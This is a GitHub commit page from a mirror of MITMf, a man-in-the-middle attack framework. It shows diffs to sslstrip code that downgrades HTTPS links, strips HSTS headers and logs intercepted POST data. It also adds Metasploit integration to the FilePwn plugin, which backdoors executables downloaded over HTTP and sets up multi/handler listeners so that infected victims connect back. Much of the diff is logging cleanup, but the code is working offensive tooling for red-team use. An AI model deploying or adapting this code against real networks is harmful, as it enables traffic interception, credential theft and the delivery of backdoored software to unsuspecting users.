github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 05:22:15 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

- Fixed bug where sometimes DNS wouldn't resolve local IP's

Browse source 
- Added Metasploit integration to Filepwn plugin
This commit is contained in:
byt3bl33d3r 2015-04-15 18:19:19 +02:00
parent 8eb09309d2
commit b91bb4271b
5 changed files with 84 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

34
core/sslstrip/ClientRequest.py
View file

@ -72,7 +72,7 @@ class ClientRequest(Request):
if 'referer' in headers: if 'referer' in headers:
real = self.urlMonitor.real real = self.urlMonitor.real
if len(real) > 0: if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers: if 'if-none-match' in headers:
@ -80,13 +80,13 @@ class ClientRequest(Request):
if 'host' in headers: if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host'])) host = self.urlMonitor.URLgetRealHost(str(headers['host']))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host)) mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host headers['host'] = host
self.setHeader('Host', host) self.setHeader('Host', host)
if 'accept-encoding' in headers: if 'accept-encoding' in headers:
del headers['accept-encoding'] del headers['accept-encoding']
mitmf_logger.debug("Zapped encoding") mitmf_logger.debug("[ClientRequest] Zapped encoding")
if 'if-modified-since' in headers: if 'if-modified-since' in headers:
del headers['if-modified-since'] del headers['if-modified-since']
@ -117,7 +117,7 @@ class ClientRequest(Request):
return "lock.ico" return "lock.ico"
def handleHostResolvedSuccess(self, address): def handleHostResolvedSuccess(self, address):
mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host") host = self.getHeader("host")
headers = self.cleanHeaders() headers = self.cleanHeaders()
client = self.getClientIP() client = self.getClientIP()
@ -138,13 +138,13 @@ class ClientRequest(Request):
url = 'http://' + host + path url = 'http://' + host + path
self.uri = url # set URI to absolute self.uri = url # set URI to absolute
if len(real) > 0: if real:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict) > 0: if patchDict:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@ -155,22 +155,22 @@ class ClientRequest(Request):
self.dnsCache.cacheResolution(hostparts[0], address) self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)): if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
mitmf_logger.debug("Sending expired cookies...") mitmf_logger.debug("[ClientRequest] Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path)) self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)): elif (self.urlMonitor.isSecureFavicon(client, path)):
mitmf_logger.debug("Sending spoofed favicon response...") mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
self.sendSpoofedFaviconResponse() self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers: if 'securelink' in headers:
del headers['securelink'] del headers['securelink']
mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url)) mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url)) self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else: else:
mitmf_logger.debug("Sending request via HTTP...") mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers) #self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80 port = 80
if len(hostparts) > 1: if len(hostparts) > 1:
@ -189,7 +189,7 @@ class ClientRequest(Request):
address = self.dnsCache.getCachedAddress(host) address = self.dnsCache.getCachedAddress(host)
if address != None: if address != None:
mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address))) mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address)))
return defer.succeed(address) return defer.succeed(address)
else: else:
@ -197,20 +197,22 @@ class ClientRequest(Request):
if self.resolver == 'dnschef': if self.resolver == 'dnschef':
try: try:
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address) address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address) return defer.succeed(address)
except Exception: except Exception:
return defer.fail() mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
return reactor.resolve(host)
elif self.resolver == 'twisted': elif self.resolver == 'twisted':
return reactor.resolve(host) return reactor.resolve(host)
def process(self): def process(self):
mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host'))) mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0] host = self.getHeader('host').split(":")[0]
if self.hsts: if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host) host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host) deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess) deferred.addCallback(self.handleHostResolvedSuccess)

35
core/sslstrip/ServerConnection.py
View file

@ -70,18 +70,18 @@ class ServerConnection(HTTPClient):
if self.command == 'GET': if self.command == 'GET':
try: try:
user_agent = parse(self.headers['user-agent']) user_agent = parse(self.headers['user-agent'])
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except: except:
self.clientInfo = "%s " % self.client.getClientIP() self.clientInfo = "{} ".format(self.client.getClientIP())
mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host']) mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
self.plugins.hook() self.plugins.hook()
self.sendCommand(self.command, self.uri) self.sendCommand(self.command, self.uri)
def sendHeaders(self): def sendHeaders(self):
for header, value in self.headers.iteritems(): for header, value in self.headers.iteritems():
mitmf_logger.debug("Sending header: (%s => %s)" % (header, value)) mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
self.sendHeader(header, value) self.sendHeader(header, value)
self.endHeaders() self.endHeaders()
@ -92,11 +92,11 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri: elif 'keylog' in self.uri:
self.plugins.hook() self.plugins.hook()
else: else:
mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData) self.transport.write(self.postData)
def connectionMade(self): def connectionMade(self):
mitmf_logger.debug("HTTP connection made.") mitmf_logger.debug("[ServerConnection] HTTP connection made.")
self.plugins.hook() self.plugins.hook()
self.sendRequest() self.sendRequest()
self.sendHeaders() self.sendHeaders()
@ -105,11 +105,11 @@ class ServerConnection(HTTPClient):
self.sendPostData() self.sendPostData()
def handleStatus(self, version, code, message): def handleStatus(self, version, code, message):
mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message)) mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message))
self.client.setResponseCode(int(code), message) self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value): def handleHeader(self, key, value):
mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value)) mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
if (key.lower() == 'location'): if (key.lower() == 'location'):
value = self.replaceSecureLinks(value) value = self.replaceSecureLinks(value)
@ -119,15 +119,15 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'content-type'): if (key.lower() == 'content-type'):
if (value.find('image') != -1): if (value.find('image') != -1):
self.isImageRequest = True self.isImageRequest = True
mitmf_logger.debug("Response is image content, not scanning...") mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
if (key.lower() == 'content-encoding'): if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1): if (value.find('gzip') != -1):
mitmf_logger.debug("Response is compressed...") mitmf_logger.debug("[ServerConnection] Response is compressed...")
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP()) mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value
@ -164,10 +164,11 @@ class ServerConnection(HTTPClient):
def handleResponse(self, data): def handleResponse(self, data):
if (self.isCompressed): if (self.isCompressed):
mitmf_logger.debug("Decompressing content...") mitmf_logger.debug("[ServerConnection] Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#mitmf_logger.debug("Read from server:\n" + data) #mitmf_logger.debug("Read from server:\n" + data)
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
res = self.plugins.hook() res = self.plugins.hook()
@ -184,7 +185,7 @@ class ServerConnection(HTTPClient):
try: try:
self.shutdown() self.shutdown()
except: except:
mitmf_logger.info("Client connection dropped before request finished.") mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
def replaceSecureLinks(self, data): def replaceSecureLinks(self, data):
if self.hsts: if self.hsts:
@ -193,7 +194,7 @@ class ServerConnection(HTTPClient):
patchDict = self.urlMonitor.patchDict patchDict = self.urlMonitor.patchDict
if len(patchDict)>0: if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data) iterator = re.finditer(ServerConnection.urlExpression, data)
@ -202,13 +203,13 @@ class ServerConnection(HTTPClient):
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl)) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl) #data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data) #data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0: if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data) #mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
@ -227,7 +228,7 @@ class ServerConnection(HTTPClient):
for match in iterator: for match in iterator:
url = match.group() url = match.group()
mitmf_logger.debug("Found secure reference: " + url) mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
url = url.replace('https://', 'http://', 1) url = url.replace('https://', 'http://', 1)
url = url.replace('&', '&') url = url.replace('&', '&')

45
plugins/FilePwn.py
View file

@ -67,6 +67,7 @@ import multiprocessing
from libs.bdfactory import pebin from libs.bdfactory import pebin
from libs.bdfactory import elfbin from libs.bdfactory import elfbin
from libs.bdfactory import machobin from libs.bdfactory import machobin
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin from plugins.plugin import Plugin
from tempfile import mkstemp from tempfile import mkstemp
from configobj import ConfigObj from configobj import ConfigObj
@ -79,7 +80,7 @@ class FilePwn(Plugin):
desc = "Backdoor executables being sent over http using bdfactory" desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"] implements = ["handleResponse"]
tree_output = ["BDFProxy v0.3.2 online"] tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2" version = "0.3"
has_opts = False has_opts = False
def initialize(self, options): def initialize(self, options):
@ -109,6 +110,20 @@ class FilePwn(Plugin):
#NOT USED NOW #NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
#Metasploit options
msfcfg = options.configfile['MITMf']['Metasploit']
rpcip = msfcfg['rpcip']
rpcpass = msfcfg['rpcpass']
try:
self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
self.msf.login('msf', rpcpass)
version = self.msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#FilePwn options
self.userConfig = options.configfile['FilePwn'] self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
@ -123,6 +138,32 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist']
self.tree_output.append("Setting up Metasploit payload handlers")
jobs = self.msf.call('job.list')
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
cmd = "use exploit/multi/handler\n"
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
cmd += "set LHOST {}\n".format(config["HOST"])
cmd += "set LPORT {}\n".format(config["PORT"])
cmd += "exploit -j\n"
if jobs:
for pid, name in jobs.iteritems():
info = self.msf.call('job.info', [pid])
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
else:
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
def convert_to_Bool(self, aString): def convert_to_Bool(self, aString):
if aString.lower() == 'true': if aString.lower() == 'true':
return True return True
@ -300,7 +341,7 @@ class FilePwn(Plugin):
except Exception as e: except Exception as e:
print 'Exception', str(e) print 'Exception', str(e)
mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e)) mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
return None return None
def tar_files(self, aTarFileBytes, formatt): def tar_files(self, aTarFileBytes, formatt):

21
plugins/JavaPwn.py
View file

@ -18,13 +18,13 @@
# USA # USA
# #
import core.msfrpc as msfrpc
import string import string
import random import random
import threading import threading
import sys import sys
import logging import logging
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler from plugins.BrowserProfiler import BrowserProfiler
from time import sleep from time import sleep
@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
self.black_ips = [] self.black_ips = []
try: try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass) msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version'] version = msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version) self.tree_output.append("Connected to Metasploit v%s" % version)
@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
self.send_command(cmd, msf, vic_ip) self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip) self.injectWait(msf, rand_url, vic_ip)
sleep(1) sleep(1)
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '\n[*] Stopping all running metasploit jobs'
for k, v in jobs.iteritems():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])

1
requirements.txt
View file

@ -10,3 +10,4 @@ pyyaml
ua-parser ua-parser
Pillow Pillow
pefile pefile
pypcap